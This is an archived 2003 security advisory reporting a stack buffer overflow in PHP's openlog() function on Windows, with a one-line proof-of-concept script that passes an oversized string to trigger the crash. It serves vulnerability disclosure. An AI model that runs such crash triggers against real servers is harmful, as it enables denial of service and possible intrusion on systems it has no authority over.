logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

PHP: buffer overflow in openlog() function
Date: 2003-03-28

Author : Sir Mordred The Traitor <sir.mordred@hushmail.com>

//@(#) Mordred Security Labs advisory

Release date: March 27, 2003
Name: PHP for Windows - buffer overflow in openlog() function
Versions affected: all versions for Windows platforms
Risk: average
Author: Sir Mordred (mordred@s-mail.com)

I. Description:

PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML.
Please visit http://www.php.net for more information about PHP.

II. Details:

There exists a classic stack overflow in the openlog() function and the
following short script will illustrate this vulnerability:

$ cat t1.php
<?php
openlog(str_repeat("X", 1500), LOG_PID, LOG_DAEMON);
?>

III. Platforms tested

Windows 200 with IIS 5.0 / PHP 4.3.1

III. Workaround

Not available at the time of writing.

IV. Vendor

PHP developers notified.



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy